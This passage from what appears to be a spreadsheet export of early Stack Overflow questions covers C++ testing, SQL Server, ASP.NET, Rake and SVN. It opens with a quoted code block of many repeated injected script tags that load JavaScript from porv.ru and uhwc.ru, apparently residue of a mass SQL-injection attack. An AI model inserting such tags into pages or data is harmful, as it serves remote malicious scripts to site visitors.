src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script&amp;gt;&amp;lt;script src=http://www.porv.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amp;lt;script src=http://www.uhwc.ru/js.js&amp;gt;&amp;lt;/script--&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to set up unit testing for Visual Studio C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm having trouble figuring out how to get the testing framework set up and usable in Visual Studio 2008 for C++ presumably with the built-in unit testing suite.&lt;/p&gt;
&lt;p&gt;Any links or tutorials would be appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Anyone soloing using fogbugz?</t>
  </si>
  <si>
    <t>&lt;p&gt;Is there anyone working solo and using fogbugz out there? I'm interested in personal experience/overhead versus paper.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;I am involved in several projects and get pretty hammered with lots of details to keep track of... Any experience welcome.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;(Yes I know Mr. Joel is on the stackoverflow team... I still want good answers :)&lt;/p&gt;</t>
  </si>
  <si>
    <t>How do you pack a visual studio c++ project for release?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm wondering how to make a release build that includes all necessary dll files into the .exe so the program can be run on a non-development machine without it having to install the microsoft redistributable on the target machine.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;Without doing this you get the error message that the application configuration is not correct and to reinstall.  &lt;/p&gt;</t>
  </si>
  <si>
    <t>Peak detection of measured signal</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We use a data acquisition card to take readings from a device that increases its signal to a peak and then falls back to near the original value. To find the peak value we currently search the array for the highest reading and use the index to determine the timing of the peak value which is used in our calculations.&lt;/p&gt;
&lt;p&gt;This works well if the highest value is the peak we are looking for but if the device is not working correctly we can see a second peak which can be higher than the initial peak. We take 10 readings a second from 16 devices over a 90 second period.&lt;/p&gt;
&lt;p&gt;My initial thoughts are to cycle through the readings checking to see if the previous and next points are less than the current to find a peak and construct an array of peaks. Maybe we should be looking at a average of a number of points either side of the current position to allow for noise in the system. Is this the best way to proceed or are there better techniques?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;We do use LabVIEW and I have checked the &lt;a href="http://forums.lavag.org/Peak-Detection-t8499.html"&gt;LAVA forums&lt;/a&gt; and there are a number of interesting examples. This is part of our test software and we are trying to avoid using too many non-standard VI libraries so I was hoping for feedback on the process/algorithms involved rather than specific code. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you get leading wildcard full-text searches to work in SQL Server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; I &lt;em&gt;am&lt;/em&gt; using SQL's Full-text search capabilities, CONTAINS clauses and all - the * is the wildcard in full-text, % is for LIKE clauses only.&lt;/p&gt;
&lt;p&gt;I've read in several places now that "leading wildcard" searches (e.g. using "*overflow" to match "stackoverflow") is not supported in MS SQL.  I'm considering using a &lt;a href="http://blogs.msdn.com/sqlclr/archive/2005/06/29/regex.aspx"&gt;CLR function to add regex matching&lt;/a&gt;, but I'm curious to see what other solutions people might have.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;More Info&lt;/strong&gt;: &lt;a href="http://msdn.microsoft.com/en-us/library/ms552152.aspx"&gt;You can add the asterisk only at the end of the word or phrase.&lt;/a&gt; - along with my empirical experience:  When matching "myvalue", "my*" works, but "(asterisk)value" returns no match, when doing a query as simple as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT * FROM TABLENAME WHERE CONTAINS(TextColumn, '"*searchterm"');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thus, my need for a workaround.  I'm only using search in my site on an actual search page - so it needs to work basically the same way that Google works (in the eyes on a Joe Sixpack-type user). Not nearly as complicated, but this sort of match really shouldn't fail.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I Transform Sql Columns into Rows?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a very simple problem which requires a very quick and simple solution in SQL Server 2005.&lt;/p&gt;
&lt;p&gt;I have a table with x Columns. I want to be able to select one row from the table and then transform the columns into rows.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;TableA
Column1, Column2, Column3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;SQL Statement to ruturn&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ResultA
Value of Column1
Value of Column2
Value of Column3
&lt;/code&gt;&lt;/pre&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;@Kevin:&lt;/strong&gt; I've had a google search on the topic but alot of the example where overly complex for my example, &lt;strong&gt;are you able to help further?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;@Mario: The solution I am creating has 10 columns which stores the values 0 to 6 and I must work out how many columns have the value 3 or more. So I thought about creating a query to turn that into rows and then using the generated table in a subquery to say count the number of rows with Column &gt;= 3&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What does the term "BODMAS" mean?</t>
  </si>
  <si>
    <t>&lt;p&gt;What is BODMAS and why is it useful in programming?&lt;/p&gt;</t>
  </si>
  <si>
    <t>How do I run Rake tasks within a Ruby script?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a &lt;code&gt;Rakefile&lt;/code&gt; with a Rake task that I would normally call from the command line:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;rake blog:post Title
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'd like to write a Ruby script that calls that Rake task multiple times, but the only solution I see is shelling out using `` (backticks) or &lt;code&gt;system&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;What's the right way to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a WMI Redistributable Package?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been working on a project that accesses the WMI to get information about the software installed on a user's machine. We've been querying Win32_Product only to find that it doesn't exist in 64-bit versions of Windows because it's an &lt;a href="http://msdn.microsoft.com/en-us/library/aa392726%28VS.85%29.aspx" rel="nofollow"&gt;"optional component"&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I know there are a lot of really good alternatives to querying the WMI for this information, but I've got a bit of a &lt;a href="http://www.codeplex.com/linq2wmi" rel="nofollow"&gt;vested interest&lt;/a&gt; in finding out how well this is going to work out.&lt;/p&gt;
&lt;p&gt;What I want to know is if there's some kind of redistributable that can be packaged with our software to allow 64-bit users to get the WMI Installer Provider put onto their machines? Right now, they have to install it manually and the installation requires they have their Windows disc handy.&lt;/p&gt;
&lt;p&gt;Edit:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;You didn't mention for what OS, but the WMI Redistributable Components version 1.0 definitely exists.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;For Operation System, we've been using .NET 3.5 so we need packages that will work on XP64 and 64bit versions of Windows Vista.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What code analysis tools do you use for your Java projects?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What code analysis tools do you use on your Java projects?&lt;/p&gt;
&lt;p&gt;I am interested in all kinds&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;static code analysis tools (FindBugs, PMD, and any others)&lt;/li&gt;
&lt;li&gt;code coverage tools (Cobertura, Emma, and any others)&lt;/li&gt;
&lt;li&gt;any other instrumentation-based tools &lt;/li&gt;
&lt;li&gt;anything else, if I'm missing something&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If applicable, also state what build tools you use and how well these tools integrate with both your IDEs and build tools. &lt;/p&gt;
&lt;p&gt;If a tool is only available a specific way (as an IDE plugin, or, say, a build tool plugin) that information is also worth noting.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What program can I use to generate diagrams of SQL view/table structure?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been tasked with redesigning part of a ms-sql database structure which currently involves a lot of views, some of which contain joins to other views. &lt;/p&gt;
&lt;p&gt;Anyway, I wonder if anyone here could recommend a utility to automatically generate diagrams to help me visualise the whole structure.&lt;/p&gt;
&lt;p&gt;What's the best program you've used for such problems?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to learn ADO.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to learn ADO.NET to build applications based on MS Office. I have read a good deal about ADO.NET in the MSDN Library, but everything seems rather messy to me.&lt;/p&gt;
&lt;p&gt;What are the basics one must figure out when using ADO.NET? I think a few key words will suffice to let me organize my learning.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>The Difference Between a DataGrid and a GridView in ASP.NET?</t>
  </si>
  <si>
    <t>&lt;p&gt;I've been doing ASP.NET development for a little while now, and I've used both the GridView and the DataGrid controls before for various things, but I never could find a really good reason to use one or the other. I'd like to know:&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;What is the difference between these 2 ASP.NET controls? What are the advantages or disadvantages of both? Is one any faster? Newer? Easier to maintain?&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;The intellisense summary for the controls doesn't seem to describe any difference between the two. They both can view, edit, and sort data and automatically generate columns at runtime.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; Visual Studio 2008 no longer lists DataGrid as an available control in the toolbox. It is still available (for legacy support I assume) if you type it in by hand though.&lt;/p&gt;</t>
  </si>
  <si>
    <t>ASP.Net 2.0 Application without Business Logic Layer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is it "acceptable" to have an &lt;strong&gt;ASP.Net 2.0&lt;/strong&gt; application without the BLL (Business Logic Layer) as the following?&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;SQL Server Data Storage &amp;amp; Stored Procedures&lt;/li&gt;
&lt;li&gt;Data Link Layer (Strongly Typed Table Adapters) connecting to Stored Procs&lt;/li&gt;
&lt;li&gt;Presentation Layer ASPX Pages with Code behind and ObjectDataSource for connection straight to the DLL&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Is a BLL always preferable, even if business logic is entirely validatable in the presentation's code behind?  What are the potential drawbacks for not using a BLL?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to easily consume a web service from PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there available any tool for PHP which can be used to generate code for consuming a &lt;a href="http://en.wikipedia.org/wiki/Web_service"&gt;web service&lt;/a&gt; based on its &lt;a href="http://en.wikipedia.org/wiki/Web_Services_Description_Language"&gt;WSDL&lt;/a&gt;? Something comparable to clicking "Add Web Reference" in Visual Studio or the Eclipse plugin which does the same thing for Java.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I create Prototype Methods (like JavaScript) in C#.Net?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How is it possible to make prototype methods in C#.Net?&lt;/p&gt;
&lt;p&gt;In JavaScript, I can do the following to create a trim method for the string object:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String.prototype.trim = function() {
    return this.replace(/^\s+|\s+$/g,"");
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I go about doing this in C#.Net?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I Java webstart multiple, dependent, native libraries?</t>
  </si>
  <si>
    <t>&lt;p&gt;Example: I have two shared objects (same should apply to .dlls). The first shared object is from a third-party library, we'll call it libA.so. I have wrapped some of this with JNI and created my own library, libB.so. Now libB depends on libA.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;When webstarting, both libraries are places in some webstart working area. My java code attempts to load libB. At this point the system loader will attempt to load libA which is not in the system library path (java.library.path won't help this). The end result is that libB has an unsatisfied link and cannot be used. &lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;I have tried loading libA before libB, but that still does not work. Seems the OS wants to do that loading for me. Is there any way I can make this work other than statically  compiling?&lt;/p&gt;</t>
  </si>
  <si>
    <t>DVCS Choices - What's good for Windows?</t>
  </si>
  <si>
    <t>&lt;p&gt;So I want to get a project on a distributed version control system, such as mercurial, git, or bazaar.  The catch is that I need the Windows support to be good, i.e. no instructions that start off with "install cygwin...".  Now I've &lt;em&gt;heard&lt;/em&gt; that git's Windows support is decent these days, but don't have any first hand experience.  Also, it sounds like the bazaar team has an explicit goal of making it as multiplatform as possible._x000D_
Can I get any recommendations?&lt;/p&gt;</t>
  </si>
  <si>
    <t>C# and Arrow Keys</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am new to C# and am doing some work in an existing application. I have a DirectX viewport that has components in it that I want to be able to position using arrow keys.&lt;/p&gt;
&lt;p&gt;Currently I am overriding ProcessCmdKey and catching arrow input and send an OnKeyPress event. This works, but I want to be able to use modifiers(&lt;strong&gt;&lt;kbd&gt;ALT&lt;/kbd&gt;+&lt;kbd&gt;CTRL&lt;/kbd&gt;+&lt;kbd&gt;SHIFT&lt;/kbd&gt;&lt;/strong&gt;). As soon as I am holding a modifier and press an arrow no events are triggered that I am listening to.&lt;/p&gt;
&lt;p&gt;Does anyone have any ideas or suggestions on where I should go with this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Authoritative source on XML-sig</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a question with regards to XML-sig and need detail about the optional elements as well as some of the canonicalization and transform stuff.  We're writing a spec for a very small XML-syntax payload that will go into the metadata of media files and it needs to by cryptographically signed.  Rather than re-invent the wheel, We thought we should use the XML-sig spec but I think most of it is overkill for what we need, and so we like to have more information/dialogue with people who know the details.&lt;/p&gt;
&lt;p&gt;Specifically, do we need to care about either transforms or canonicalization if the XML is very basic with no tabs for formatting and is specific to our needs?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is this regular expression faster?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a Telnet client of sorts in C# and part of what I have to parse are ANSI/VT100 escape sequences, specifically, just those used for colour and formatting (detailed &lt;a href="http://www.termsys.demon.co.uk/vtansi.htm#colors"&gt;here&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;One method I have is one to find all the codes and remove them, so I can render the text without any formatting if needed:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    
public static string StripStringFormating(string formattedString)
{
    if (rTest.IsMatch(formattedString))
        return rTest.Replace(formattedString, string.Empty);
    else
        return formattedString;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm new to regular expressions and I was suggested to use this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static Regex rText = new Regex(@"\e\[[\d;]+m", RegexOptions.Compiled);&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, this failed if the escape code was incomplete due to an error on the server. So then this was suggested, but my friend warned it might be slower (this one also matches another condition (z) that I might come across later):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static Regex rTest = 
              new Regex(@"(\e(\[([\d;]*[mz]?))?)?", RegexOptions.Compiled);&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This not only worked, but was in fact faster to and reduced the impact on my text rendering. Can someone explain to a regexp newbie, why? :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is a "Confirm Email" input good practice when user changes email address?</t>
  </si>
  <si>
    <t>&lt;p&gt;My organization has a form to allow users to update their email address with us._x000D_
It's suggested that we have two input boxes for email: the second as an email confirmation.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;I always copy/paste my email address when faced with the confirmation._x000D_
I'm assuming most of our users are not so savvy.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;Regardless, is this considered a good practice?_x000D_
I can't stand it personally, but I also realize it probably isn't meant for me._x000D_
If someone screws up their email, they can't login, and they must call to sort things out.&lt;/p&gt;</t>
  </si>
  <si>
    <t>How to reference to multiple version assembly</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm developing a Sharepoint application and use .NET AjaxControlToolkit library, we are adding a custom aspx page to the Sharepoint. Sharepoint 2007 run in quirks mode so I've made some modification to the AJAX library to make it behave like it normally should. The problem is, the other team already use AJAX library and it is a different version with mine. This cause conflict because there could be only one dll in the bin folder with the same name.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;From what I know, .NET should be able to handle this situation easily. I've tried using strong name and GAC to solve it, but it still refer to the dll in the bin folder. If there is no AjaxControlToolkit.dll in the bin folder, the application will simply fail to load the assembly. &lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;If I use complete assembly information on my like this &lt;/p&gt;_x000D_
_x000D_
&lt;pre&gt;&lt;code&gt;&amp;lt;%@ &lt;br&gt;    Register &lt;br&gt;    tagprefix="AjaxControlToolkit"&lt;br&gt;    namespace="AjaxControlToolkit"&lt;br&gt;    assembly="AjaxControlToolkit, Version=1.0.299.18064, &lt;br&gt;    PublicKeyToken=12345678abcdefgh, &lt;br&gt;    Culture=neutral"&lt;br&gt;%&amp;gt;&lt;br&gt;&lt;/code&gt;&lt;/pre&gt;_x000D_
_x000D_
&lt;p&gt;It gives me Compiler Error CS0433&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;Can someone help me on how to use multiple version of assembly in an application?&lt;/p&gt;</t>
  </si>
  <si>
    <t>SQL Server Management Studio alternatives to browse/edit tables and run queries</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering if there are any alternatives to Microsoft's SQL Server Management Studio?&lt;/p&gt;
&lt;p&gt;Not there's anything wrong with SSMS, but sometimes it just seem too big an application where all I want todo is browse/edit tables and run queries.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to wrap time around the work day?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a situation where I want to add hours to a date and have the new date wrap around the work-day. I cobbled up a function to determine this new date, but want to make sure that I'm not forgetting anything.&lt;/p&gt;
&lt;p&gt;The hours to be added is called "delay". It could easily be a parameter to the function instead.&lt;/p&gt;
&lt;p&gt;Please post any suggestions. [VB.NET Warning]&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Private Function GetDateRequired() As Date
    ''// A decimal representation of the current hour
    Dim hours As Decimal = Decimal.Parse(Date.Now.Hour) + (Decimal.Parse(Date.Now.Minute) / 60.0) 
    Dim delay As Decimal = 3.0           ''// delay in hours
    Dim endOfDay As Decimal = 12.0 + 5.0 ''// end of day, in hours
    Dim startOfDay As Decimal = 8.0      ''// start of day, in hours
    Dim newHour As Integer
    Dim newMinute As Integer
    Dim dateRequired As Date = Now
    Dim delta As Decimal = hours + delay
    ''// Wrap around to the next day, if necessary
    If delta &amp;gt; endOfDay Then
        delta = delta - endOfDay
        dateRequired = dateRequired.AddDays(1)
        newHour = Integer.Parse(Decimal.Truncate(delta))
        newMinute = Integer.Parse(Decimal.Truncate((delta - newHour) * 60))
        newHour = startOfDay + newHour
    Else
        newHour = Integer.Parse(Decimal.Truncate(delta))
        newMinute = Integer.Parse(Decimal.Truncate((delta - newHour) * 60))
    End If
    dateRequired = New Date(dateRequired.Year, dateRequired.Month, dateRequired.Day, newHour, newMinute, 0)
    Return dateRequired
End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt;: This will probably not work if delay is more than 9 hours long. It should never change from 3, through.&lt;/p&gt;
&lt;p&gt;EDIT:
The goal is find the date and time that you get as a result of adding several hours to the current time. This is used to determine a default value for a due date of a submission. I want to add 3 hours to the current time to get the due date time. However, I don't want due dates that go beyond 5pm on the current day. So, I tried to have the hours split between (today, up to 5pm) and (tomorrow, from 8am on), such that adding 3 hours to 4pm would give you 19am, because 1 hour is added to the end of today and 2 hours are added to the beginning of tomorrow.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Telligent's Community Server</t>
  </si>
  <si>
    <t>&lt;p&gt;The company I work for is wanting to add blog functionality to our website and they were looking to spend an awful amount of money to have some crap being built on top of a CMS they purchased (sitecore).  I pointed them to Telligent's Community Server and  we had a sales like meeting today to get the Marketing folks on board. _x000D_
My question is if anyone has had issues working with Community Server, skinning it and extending it?&lt;br&gt;_x000D_
I wanted to explain a bit why I am thinking Community Server, the company is wanting multiple blogs with multiple authors.  I want to be out of the admin part of this as much as possible and didn't think there were too many engines that having multiple blogs didn't mean db work.  I also like the other functionality that Community Server provides and think the company will find it useful, particularly the media section as right now we have some really shotty way of dealing with whitepapers and stuff.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;edit: We are actually using the Sitecore blog module for a single blog on our intranet (which is actually what the CMS is serving).  Some reasoning for why I don't like it for our public site are they are on different servers, it doesn't support multiple authors, there is no built in syndication, it is a little flimsy feeling to me from looking at the source and I personally think the other features of Community Server make its price tag worth it.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;another edit: Need to stick to .net software that run on sql server in my company's case, but I don't mind seeing recommendations for others.  ExpressionEngine looks promising, will try it out on my personal box.&lt;/p&gt;</t>
  </si>
  <si>
    <t>Tables with no Primary Key</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have several tables whose only unique data is a uniqueidentifier (a Guid) column. Because guids are non-sequential (and they're client-side generated so I can't use newsequentialid()), I have made a non-primary, non-clustered index on this ID field rather than giving the tables a clustered primary key.&lt;/p&gt;
&lt;p&gt;I'm wondering what the performance implications are for this approach. I've seen some people suggest that tables should have an auto-incrementing ("identity") int as a clustered primary key even if it doesn't have any meaning, as it means that the database engine itself can use that value to quickly look up a row instead of having to use a bookmark.&lt;/p&gt;
&lt;p&gt;My database is merge-replicated across a bunch of servers, so I've shied away from identity int columns as they're a bit hairy to get right in replication.&lt;/p&gt;
&lt;p&gt;What are your thoughts? Should tables have primary keys? Or is it ok to not have any clustered indexes if there are no sensible columns to index that way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MVC Preview 4 - No route in the route table matches the supplied values</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a route that I am calling through a RedirectToRoute like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;return this.RedirectToRoute("Super-SuperRoute", new { year = selectedYear });
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have also tried:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; return this.RedirectToRoute("Super-SuperRoute", new { controller = "Super", action = "SuperRoute", id = "RouteTopic", year = selectedYear });
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The route in the global.asax is like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;routes.MapRoute(
    "Super-SuperRoute", // Route name
    "Super.mvc/SuperRoute/{year}",  // URL with parameters
     new { controller = "Super", action = "SuperRoute", id = "RouteTopic" }  // Parameter defaults
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So why do I get the error: "No route in the route table matches the supplied values."?&lt;/p&gt;
&lt;p&gt;I saw that the type of selectedYear was var.  When I tried to convert to int with int.Parse I realised that selectedYear was actually null, which would explain the problems.  I guess next time I'll pay more attention to the values of the variables at a breakpoint :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there any negative reasons to use an N-Tier solution?</t>
  </si>
  <si>
    <t>&lt;p&gt;I'm pretty new to my company (2 weeks) and we're starting a new platform for our system using .NET 3.5 Team Foundation from DotNetNuke. Our "architect" is suggesting we use one class project. Of course, I chime back with a "3-tier" architecture (Business, Data, Web class projects). &lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;Is there any disadvantages to using this architecture? Pro's would be separation of code from data, keeping class objects away from your code, etc.&lt;/p&gt;</t>
  </si>
  <si>
    <t>What to use for login ID?</t>
  </si>
  <si>
    <t>&lt;p&gt;We are in the early design stages of a major rewrite of our product. Right now our customers are mostly businesses. We manage accounts. User names for an account are each on their own namespace but it means that we can't move assets between servers.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;We want to move to a single namespace. But that brings the problem of unique user names.&lt;/p&gt;_x000D_
_x000D_
&lt;p&gt;So what's the best idea?&lt;/p&gt;_x000D_
_x000D_
&lt;ul&gt;_x000D_
&lt;li&gt;Email address (w/verification) ?&lt;/li&gt;_x000D_
&lt;li&gt;Unique alpha-numeric string ("johnsmith9234")?&lt;/li&gt;_x000D_
&lt;li&gt;Should we look at OpenID?&lt;/li&gt;_x000D_
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>Normalizing a Table with Low Integrity</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been handed a table with about 18000 rows. Each record describes the location of one customer. The issue is, that when the person created the table, they did not add a field for "Company Name", only "Location Name," and one company can have many locations.&lt;/p&gt;
&lt;p&gt;For example, here are some records that describe the same customer:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Location Table&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; ID  Location_Name     
 1   TownShop#1        
 2   Town Shop - Loc 2 
 3   The Town Shop     
 4   TTS - Someplace   
 5   Town Shop,the 3   
 6   Toen Shop4        
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My goal is to make it look like:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Location Table&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; ID  Company_ID   Location_Name     
 1   1            Town Shop#1       
 2   1            Town Shop - Loc 2 
 3   1            The Town Shop     
 4   1            TTS - Someplace   
 5   1            Town Shop,the 3   
 6   1            Toen Shop4        
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Company Table&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; Company_ID  Company_Name  
 1           The Town Shop 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There is no "Company" table, I will have to generate the Company Name list from the most descriptive or best Location Name that represents the multiple locations.&lt;/p&gt;
&lt;p&gt;Currently I am thinking I need to generate a list of Location Names that are similar, and then and go through that list by hand.&lt;/p&gt;
&lt;p&gt;Any suggestions on how I can approach this is appreciated.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;@Neall, Thank you for your statement, but unfortunately, each location name is distinct, there are no duplicate location names, only similar. So in the results from your statement "repcount" is 1 in each row.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;@yukondude, Your step 4 is the heart of my question.&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Repair SVN Checksum</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using subclipse in Flex Builder 3, and recently received this error when trying to commit:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;svn: Checksum mismatch for '/Users/redacted/Documents/Flex Builder 3/path/to/my/file.mxml'; expected: 'f8cb275de72776657406154dd3c10348', actual: 'null'&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I worked around it by:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Committing all the other changed files, omitting the troublesome one.&lt;/li&gt;
&lt;li&gt;Copying the contents of the trouble file to a TextMate window&lt;/li&gt;
&lt;li&gt;Deleting my project in FlexBuilder/Eclipse&lt;/li&gt;
&lt;li&gt;Checking my project out fresh from SVN&lt;/li&gt;
&lt;li&gt;Copying the text of the trouble file back in from the TextMate Window&lt;/li&gt;
&lt;li&gt;Committing the changes.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;It worked, but I can't help but think there's a better way. What's actaully happening to cause the svn:checksum error, and what's the best fix.&lt;/p&gt;
&lt;p&gt;Maybe more important -- is this a symptom of a greater problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>E-mail Notifications</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In a .net system I'm building, there is a need for automated e-mail notifications. These should be editable by an admin. What's the easiest way to do this? SQL table and WYSIWIG for editing?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;The queue is a great idea. I've been throwing around that type of process for awhile with my old company.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Multiple foreign keys?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a table that is supposed to track days and costs for shipping product from one vendor to another. We (brilliantly :p) stored both the shipping vendors (FedEx, UPS) with the product handling vendors (Think... Dunder Mifflin) in a "VENDOR" table. So, I have three columns in my SHIPPING_DETAILS table that all reference VENDOR.no. For some reason MySQL isn't letting me define all three as foreign keys. Any ideas?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE SHIPPING_GRID(  
    id INT NOT NULL AUTO_INCREMENT PRIMARY KEY COMMENT 'Unique ID for each row',  
    shipping_vendor_no INT(6) NOT NULL COMMENT 'Foreign key to VENDOR.no for the shipping vendor (vendors_type must be 3)',  
    start_vendor_no INT(6) NOT NULL COMMENT 'Foreign key to VENDOR.no for the vendor being shipped from',  
